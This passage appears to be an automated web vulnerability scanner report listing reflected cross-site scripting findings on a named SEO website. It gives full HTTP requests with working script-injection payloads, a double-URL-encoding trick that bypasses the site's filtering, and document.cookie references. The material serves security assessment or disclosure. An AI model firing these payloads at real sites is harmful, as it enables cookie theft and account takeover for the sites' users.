This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3Cbe063%253balert%25281%2529%252f%252f1edc52f10f0/img/xml-sitemap.jpeg HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:52:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 26859


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde</title>
...[SNIP]...
<be063;alert(1)//1edc52f10f0/img/xml-sitemap.jpeg SEO101 Stats and Site Ranking</title>
...[SNIP]...

4.158. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/xml-sitemap.jpeg [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://seo101.co
Path:   /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/xml-sitemap.jpeg

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2fbf"><script>alert(1)</script>75484e96ae1 was submitted in the REST URL parameter 3. This input was echoed as d2fbf\"><script>alert(1)</script>75484e96ae1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/imgd2fbf"><script>alert(1)</script>75484e96ae1/xml-sitemap.jpeg HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:52:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 26927


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde</title>
...[SNIP]...
</imgd2fbf\"><script>alert(1)</script>75484e96ae1/xml-sitemap.jpeg seo stats, domain analysis, website ranking, site worth, seo101, site ranking, site performance," />
...[SNIP]...

4.159. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/xml-sitemap.jpeg [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://seo101.co
Path:   /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/xml-sitemap.jpeg

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload bfb0f%253balert%25281%2529%252f%252fdf6abbdbd6d was submitted in the REST URL parameter 3. This input was echoed as bfb0f;alert(1)//df6abbdbd6d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/imgbfb0f%253balert%25281%2529%252f%252fdf6abbdbd6d/xml-sitemap.jpeg HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:57:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 26916


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde</title>
...[SNIP]...
</imgbfb0f;alert(1)//df6abbdbd6d/xml-sitemap.jpeg SEO101 Stats and Site Ranking</title>
...[SNIP]...

4.160. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/xml-sitemap.jpeg [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://seo101.co
Path:   /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/xml-sitemap.jpeg

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 8b541%253balert%25281%2529%252f%252f01ce04eaf40 was submitted in the REST URL parameter 4. This input was echoed as 8b541;alert(1)//01ce04eaf40 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/xml-sitemap.jpeg8b541%253balert%25281%2529%252f%252f01ce04eaf40 HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 18:00:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 26903


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde</title>
...[SNIP]...
</img/xml-sitemap.jpeg8b541;alert(1)//01ce04eaf40 SEO101 Stats and Site Ranking</title>
...[SNIP]...

4.161. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/xml-sitemap.jpeg [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://seo101.co
Path:   /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/xml-sitemap.jpeg

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a487b"><script>alert(1)</script>1fdeb6d84a1 was submitted in the REST URL parameter 4. This input was echoed as a487b\"><script>alert(1)</script>1fdeb6d84a1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/img/xml-sitemap.jpega487b"><script>alert(1)</script>1fdeb6d84a1 HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:58:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 26984


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde</title>
...[SNIP]...
</img/xml-sitemap.jpega487b\"><script>alert(1)</script>1fdeb6d84a1 seo stats, domain analysis, website ranking, site worth, seo101, site ranking, site performance," />
...[SNIP]...

4.162. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/js/jquery.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://seo101.co
Path:   /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/js/jquery.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5dbbe</script><script>alert(1)</script>f31b1dff3de was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /xss.cxc5cde%3C5dbbe</script><script>alert(1)</script>f31b1dff3de/title%3E%3Cscript%3Ealert(document.cookie)%3C/js/jquery.js HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:38:55 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 26918


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde<5dbbe</
...[SNIP]...
<5dbbe</script><script>alert(1)</script>f31b1dff3de/title>
...[SNIP]...

4.163. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/js/jquery.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://seo101.co
Path:   /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/js/jquery.js

Issue detail

The value of REST URL parameter 1 is copied into the name of an HTML tag. The payload ef595><script>alert(1)</script>102cb460ae6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /xss.cxc5cde%3Cef595><script>alert(1)</script>102cb460ae6/title%3E%3Cscript%3Ealert(document.cookie)%3C/js/jquery.js HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:36:30 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 26886


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde<ef595><script>alert(1)</script>102cb460ae6/title>
...[SNIP]...

4.164. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/js/jquery.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://seo101.co
Path:   /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/js/jquery.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 659f2"><script>alert(1)</script>97310d20da1 was submitted in the REST URL parameter 1. This input was echoed as 659f2\"><script>alert(1)</script>97310d20da1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /xss.cxc5cde%3C659f2"><script>alert(1)</script>97310d20da1/title%3E%3Cscript%3Ealert(document.cookie)%3C/js/jquery.js HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:36:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 26894


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde<659f2\"
...[SNIP]...
<659f2\"><script>alert(1)</script>97310d20da1/title>
...[SNIP]...

4.165. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/js/jquery.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://seo101.co
Path:   /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/js/jquery.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload f9127%253balert%25281%2529%252f%252faa3f93e9c93 was submitted in the REST URL parameter 2. This input was echoed as f9127;alert(1)//aa3f93e9c93 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3Cf9127%253balert%25281%2529%252f%252faa3f93e9c93/js/jquery.js HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:53:49 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 26827


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde</title>
...[SNIP]...
<f9127;alert(1)//aa3f93e9c93/js/jquery.js SEO101 Stats and Site Ranking</title>
...[SNIP]...

4.166. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/js/jquery.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://seo101.co
Path:   /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/js/jquery.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75959"><script>alert(1)</script>7d89ea9873a was submitted in the REST URL parameter 2. This input was echoed as 75959\"><script>alert(1)</script>7d89ea9873a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C75959"><script>alert(1)</script>7d89ea9873a/js/jquery.js HTTP/1.1
Host: seo101.co
Proxy-Connection: keep-alive
Referer: http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E79857da5316
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bc1df7c3eb31a85f8cb6b162647117ce

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:46:37 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 26908


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>xss.cxc5cde</title>
...[SNIP]...
<75959\"><script>alert(1)</script>7d89ea9873a/js/jquery.js seo stats, domain analysis, website ranking, site worth, seo101, site ranking, site performance," />
...[SNIP]...

4.167. http://seo101.co/xss.cxc5cde%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/js/jquery.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:&